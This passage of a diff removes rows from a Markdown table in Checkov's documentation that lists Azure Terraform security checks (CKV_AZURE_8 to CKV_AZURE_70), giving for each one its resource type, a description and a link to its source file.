-| 1201 | CKV_AZURE_8     | resource | azurerm_kubernetes_cluster                              | Ensure Kubernetes Dashboard is disabled                                                                                                                                                                  | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py)                                                                             |
-| 1202 | CKV_AZURE_9     | resource | azurerm_network_security_group                          | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py)                                                                 |
-| 1203 | CKV_AZURE_9     | resource | azurerm_network_security_rule                           | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py)                                                                 |
-| 1204 | CKV_AZURE_10    | resource | azurerm_network_security_group                          | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py)                                                                 |
-| 1205 | CKV_AZURE_10    | resource | azurerm_network_security_rule                           | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py)                                                                 |
-| 1206 | CKV_AZURE_11    | resource | azurerm_mariadb_firewall_rule                           | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                       |
-| 1207 | CKV_AZURE_11    | resource | azurerm_mysql_firewall_rule                             | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                       |
-| 1208 | CKV_AZURE_11    | resource | azurerm_postgresql_firewall_rule                        | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                       |
-| 1209 | CKV_AZURE_11    | resource | azurerm_sql_firewall_rule                               | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                       |
-| 1210 | CKV_AZURE_12    | resource | azurerm_network_watcher_flow_log                        | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py)                                                               |
-| 1211 | CKV_AZURE_13    | resource | azurerm_app_service                                     | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                     |
-| 1212 | CKV_AZURE_13    | resource | azurerm_linux_web_app                                   | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                     |
-| 1213 | CKV_AZURE_13    | resource | azurerm_windows_web_app                                 | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                     |
-| 1214 | CKV_AZURE_14    | resource | azurerm_app_service                                     | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                               |
-| 1215 | CKV_AZURE_14    | resource | azurerm_linux_web_app                                   | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                               |
-| 1216 | CKV_AZURE_14    | resource | azurerm_windows_web_app                                 | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                               |
-| 1217 | CKV_AZURE_15    | resource | azurerm_app_service                                     | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                       |
-| 1218 | CKV_AZURE_15    | resource | azurerm_linux_web_app                                   | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                       |
-| 1219 | CKV_AZURE_15    | resource | azurerm_windows_web_app                                 | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                       |
-| 1220 | CKV_AZURE_16    | resource | azurerm_app_service                                     | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                 |
-| 1221 | CKV_AZURE_16    | resource | azurerm_linux_web_app                                   | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                 |
-| 1222 | CKV_AZURE_16    | resource | azurerm_windows_web_app                                 | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                 |
-| 1223 | CKV_AZURE_17    | resource | azurerm_app_service                                     | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                               |
-| 1224 | CKV_AZURE_17    | resource | azurerm_linux_web_app                                   | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                               |
-| 1225 | CKV_AZURE_17    | resource | azurerm_windows_web_app                                 | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                               |
-| 1226 | CKV_AZURE_18    | resource | azurerm_app_service                                     | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                     |
-| 1227 | CKV_AZURE_18    | resource | azurerm_linux_web_app                                   | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                     |
-| 1228 | CKV_AZURE_18    | resource | azurerm_windows_web_app                                 | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                     |
-| 1229 | CKV_AZURE_19    | resource | azurerm_security_center_subscription_pricing            | Ensure that standard pricing tier is selected                                                                                                                                                            | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py)                                                           |
-| 1230 | CKV_AZURE_20    | resource | azurerm_security_center_contact                         | Ensure that security contact 'Phone number' is set                                                                                                                                                       | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py)                                                                 |
-| 1231 | CKV_AZURE_21    | resource | azurerm_security_center_contact                         | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py)                                                       |
-| 1232 | CKV_AZURE_22    | resource | azurerm_security_center_contact                         | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py)                                           |
-| 1233 | CKV_AZURE_23    | resource | azurerm_mssql_server                                    | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                             |
-| 1234 | CKV_AZURE_23    | resource | azurerm_mssql_server_extended_auditing_policy           | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                             |
-| 1235 | CKV_AZURE_23    | resource | azurerm_sql_server                                      | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                             |
-| 1236 | CKV_AZURE_24    | resource | azurerm_mssql_server                                    | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                             |
-| 1237 | CKV_AZURE_24    | resource | azurerm_mssql_server_extended_auditing_policy           | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                             |
-| 1238 | CKV_AZURE_24    | resource | azurerm_sql_server                                      | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                             |
-| 1239 | CKV_AZURE_25    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that 'Threat Detection types' is set to 'All'                                                                                                                                                     | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py)                                                           |
-| 1240 | CKV_AZURE_26    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                                                                                                                | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py)                                                               |
-| 1241 | CKV_AZURE_27    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                                                                                                                         | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py)                                               |
-| 1242 | CKV_AZURE_28    | resource | azurerm_mysql_server                                    | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                                                                                                            | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py)                                                     |
-| 1243 | CKV_AZURE_29    | resource | azurerm_postgresql_server                               | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                                                                                                                       | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py)                                           |
-| 1244 | CKV_AZURE_30    | resource | azurerm_postgresql_configuration                        | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py)                                           |
-| 1245 | CKV_AZURE_31    | resource | azurerm_postgresql_configuration                        | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py)                                           |
-| 1246 | CKV_AZURE_32    | resource | azurerm_postgresql_configuration                        | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py)                               |
-| 1247 | CKV_AZURE_33    | resource | azurerm_storage_account                                 | Ensure Storage logging is enabled for Queue service for read, write and delete requests                                                                                                                  | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py)                                     |
-| 1248 | CKV_AZURE_34    | resource | azurerm_storage_container                               | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py)                                     |
-| 1249 | CKV_AZURE_35    | resource | azurerm_storage_account                                 | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                         |
-| 1250 | CKV_AZURE_35    | resource | azurerm_storage_account_network_rules                   | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                         |
-| 1251 | CKV_AZURE_36    | resource | azurerm_storage_account                                 | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                                     |
-| 1252 | CKV_AZURE_36    | resource | azurerm_storage_account_network_rules                   | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                                     |
-| 1253 | CKV_AZURE_37    | resource | azurerm_monitor_log_profile                             | Ensure that Activity Log Retention is set 365 days or greater                                                                                                                                            | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py)                                                         |
-| 1254 | CKV_AZURE_38    | resource | azurerm_monitor_log_profile                             | Ensure audit profile captures all the activities                                                                                                                                                         | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py)                                                               |
-| 1255 | CKV_AZURE_39    | resource | azurerm_role_definition                                 | Ensure that no custom subscription owner roles are created                                                                                                                                               | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py)                                           |
-| 1256 | CKV_AZURE_40    | resource | azurerm_key_vault_key                                   | Ensure that the expiration date is set on all keys                                                                                                                                                       | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py)                                                                                   |
-| 1257 | CKV_AZURE_41    | resource | azurerm_key_vault_secret                                | Ensure that the expiration date is set on all secrets                                                                                                                                                    | Terraform | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py)                                                                             |
-| 1258 | CKV_AZURE_42    | resource | azurerm_key_vault                                       | Ensure the key vault is recoverable                                                                                                                                                                      | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py)                                                                       |
-| 1259 | CKV_AZURE_43    | resource | azurerm_storage_account                                 | Ensure Storage Accounts adhere to the naming rules                                                                                                                                                       | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py)                                                                                 |
-| 1260 | CKV_AZURE_44    | resource | azurerm_storage_account                                 | Ensure Storage Account is using the latest version of TLS encryption                                                                                                                                     | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py)                                                       |
-| 1261 | CKV_AZURE_45    | resource | azurerm_virtual_machine                                 | Ensure that no sensitive credentials are exposed in VM custom_data                                                                                                                                       | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py)                                                                               |
-| 1262 | CKV_AZURE_47    | resource | azurerm_mariadb_server                                  | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                                                                                                                  | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py)                                                             |
-| 1263 | CKV_AZURE_48    | resource | azurerm_mariadb_server                                  | Ensure 'public network access enabled' is set to 'False' for MariaDB servers                                                                                                                             | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py)                                                               |
-| 1264 | CKV_AZURE_49    | resource | azurerm_linux_virtual_machine_scale_set                 | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                                                                                                                      | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py)                                                                           |
-| 1265 | CKV_AZURE_50    | resource | azurerm_linux_virtual_machine                           | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py)                                                                       |
-| 1266 | CKV_AZURE_50    | resource | azurerm_windows_virtual_machine                         | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py)                                                                       |
-| 1267 | CKV_AZURE_52    | resource | azurerm_mssql_server                                    | Ensure MSSQL is using the latest version of TLS encryption                                                                                                                                               | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py)                                                                     |
-| 1268 | CKV_AZURE_53    | resource | azurerm_mysql_server                                    | Ensure 'public network access enabled' is set to 'False' for mySQL servers                                                                                                                               | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py)                                                                   |
-| 1269 | CKV_AZURE_54    | resource | azurerm_mysql_server                                    | Ensure MySQL is using the latest version of TLS encryption                                                                                                                                               | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py)                                                                     |
-| 1270 | CKV_AZURE_55    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Servers                                                                                                                                                      | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py)                                                                         |
-| 1271 | CKV_AZURE_56    | resource | azurerm_function_app                                    | Ensure that function apps enables Authentication                                                                                                                                                         | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py)                                                     |
-| 1272 | CKV_AZURE_57    | resource | azurerm_app_service                                     | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                         |
-| 1273 | CKV_AZURE_57    | resource | azurerm_linux_web_app                                   | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                         |
-| 1274 | CKV_AZURE_57    | resource | azurerm_windows_web_app                                 | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                         |
-| 1275 | CKV_AZURE_58    | resource | azurerm_synapse_workspace                               | Ensure that Azure Synapse workspaces enables managed virtual networks                                                                                                                                    | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py)                           |
-| 1276 | CKV_AZURE_59    | resource | azurerm_storage_account                                 | Ensure that Storage accounts disallow public access                                                                                                                                                      | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py)                                                   |
-| 1277 | CKV_AZURE_61    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for App Service                                                                                                                                                  | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py)                                                                 |
-| 1278 | CKV_AZURE_62    | resource | azurerm_function_app                                    | Ensure function apps are not accessible from all regions                                                                                                                                                 | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py)                                                                       |
-| 1279 | CKV_AZURE_63    | resource | azurerm_app_service                                     | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                             |
-| 1280 | CKV_AZURE_63    | resource | azurerm_linux_web_app                                   | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                             |
-| 1281 | CKV_AZURE_63    | resource | azurerm_windows_web_app                                 | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                             |
-| 1282 | CKV_AZURE_64    | resource | azurerm_storage_sync                                    | Ensure that Azure File Sync disables public network access                                                                                                                                               | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py)                                                       |
-| 1283 | CKV_AZURE_65    | resource | azurerm_app_service                                     | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                         |
-| 1284 | CKV_AZURE_65    | resource | azurerm_linux_web_app                                   | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                         |
-| 1285 | CKV_AZURE_65    | resource | azurerm_windows_web_app                                 | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                         |
-| 1286 | CKV_AZURE_66    | resource | azurerm_app_service                                     | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                           |
-| 1287 | CKV_AZURE_66    | resource | azurerm_linux_web_app                                   | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                           |
-| 1288 | CKV_AZURE_66    | resource | azurerm_windows_web_app                                 | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                           |
-| 1289 | CKV_AZURE_67    | resource | azurerm_function_app                                    | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py)                                                             |
-| 1290 | CKV_AZURE_67    | resource | azurerm_function_app_slot                               | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py)                                                             |
-| 1291 | CKV_AZURE_68    | resource | azurerm_postgresql_server                               | Ensure that PostgreSQL server disables public network access                                                                                                                                             | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py)                                             |
-| 1292 | CKV_AZURE_69    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Azure SQL database servers                                                                                                                                   | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py)                                                                   |
-| 1293 | CKV_AZURE_70    | resource | azurerm_function_app                                    | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1294 | CKV_AZURE_70    | resource | azurerm_function_app_slot                               | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
